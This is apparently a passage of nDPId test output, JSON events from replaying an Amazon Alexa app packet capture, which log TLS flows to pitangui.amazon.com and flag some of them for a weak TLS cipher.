+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1490976086219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok2JAAEAGs6CsECrYNF7ohrKJAbv5cMy3LToAJFAQAVcS5QAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1490976086220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086220,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo3c9AAEAGaTOsECrYNF7ohrKLAbvdeYITB3nM31AQAVfSgwAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1490976086880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976086880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/ZAAEAGPiOsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93zQAAAgQFtAQCCAoA9mBAAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088605,"flow_last_seen":1490976088605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088605,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1490976088605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088605,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81ixAAEAGcMKsECrYNF7ohrKNAbu9HLbAAAAAAKAC\/\/\/KKQAAAgQFtAQCCAoA9mDsAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088631,"flow_last_seen":1490976088631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1490976088631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088631,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NFtAAEAGEpSsECrYNF7ohrKOAbuEplS0AAAAAKAC\/\/9kqAAAAgQFtAQCCAoA9mDvAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwfFZAAOcGI6Q0XuiGrBAq2AG7so2w2ze+vRy2wXASH\/5ffQAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3pBAAOcGwWk0XuiGrBAq2AG7so5AYHD5hKZUtXASH\/4xPwAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1490976088847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088847,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo1i1AAEAGcNWsECrYNF7ohrKNAbu9HLbBsNs3v1AQAVep7gAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1490976088850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088850,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNFxAAEAGEqesECrYNF7ohrKOAbuEplS1QGBw+lAQAVd7sAAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1490976088880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/dAAEAGPiKsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93BQAAAgQFtAQCCAoA9mEIAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088937,"flow_last_seen":1490976088937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088937,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1490976088937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088937,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTlAAEAGCbasECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZowAAAgQFtAQCCAoA9mENAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088958,"flow_last_seen":1490976088958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088958,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1490976088958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088958,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFJAAEAGMp2sECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/FYwAAAgQFtAQCCAoA9mEPAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089173,"flow_last_seen":1490976089173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089173,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1490976089173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089173,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Al9AAEAGRJCsECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+yQAAAAgQFtAQCCAoA9mElAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089227,"flow_last_seen":1490976089227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089227,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1490976089227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089227,"pkt":"AMDKkaPvePiC0\/vCCABFAAA835BAAEAGZ16sECrYNF7ohrKSAbuabb66AAAAAKAC\/\/\/kmwAAAgQFtAQCCAoA9mEqAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089239,"flow_last_seen":1490976089239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1490976089239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089239,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TPtAAEAG+fOsECrYNF7ohrKTAbvSFy3QAAAAAKAC\/\/892gAAAgQFtAQCCAoA9mErAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089426,"flow_last_seen":1490976089426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089426,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1490976089426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089426,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZGdAAEAG4oesECrYNF7ohsHeAFAhsQVZAAAAAKAC\/\/8IxQAAAgQFtAQCCAoA9mE+AAAAAAEDAwg="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1490976089930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTpAAEAGCbWsECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZPwAAAgQFtAQCCAoA9mFxAAAAAAEDAwg="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1490976089963,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089963,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFNAAEAGMpysECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/E\/wAAAgQFtAQCCAoA9mFzAAAAAAEDAwg="} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwtKtAAOcG6040XuiGrBAq2AG7spNBzzb30hct0XASH\/5DQAAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe6ZAAOcGJFQ0XuiGrBAq2AG7so\/BFRS5iAxcNXASH\/4B4wAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwa1pAAOcGNKA0XuiGrBAq2ABQwd5KW8E7IbEFWnASH\/57bQAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe7VAAOcGJEU0XuiGrBAq2AG7spKfnILVmm2+u3ASH\/5AVQAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9UZAAOcGqrM0XuiGrBAq2AG7spCu8tJmAyB1XnASH\/7CGgAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjedAAOcGEhM0XuiGrBAq2ABQwds2rrGpGjBje3ASH\/5IDwAAAgQFtAEDAwY="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1490976090170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090170,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AmBAAEAGRI+sECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+x3AAAAgQFtAQCCAoA9mGJAAAAAAEDAwg="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTPxAAEAG+gasECrYNF7ohrKTAbvSFy3RQc82+FAQAVeNsQAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZGhAAEAG4pqsECrYNF7ohsHeAFAhsQVaSlvBPFAQAVfF3gAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo35FAAEAGZ3GsECrYNF7ohrKSAbuabb67n5yC1lAQAVeKxgAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 